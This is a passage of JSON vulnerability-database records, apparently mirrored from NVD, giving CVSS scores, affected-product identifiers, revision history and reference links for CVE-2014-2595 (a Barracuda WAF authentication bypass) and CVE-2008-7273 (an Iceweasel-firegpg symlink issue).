"PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", 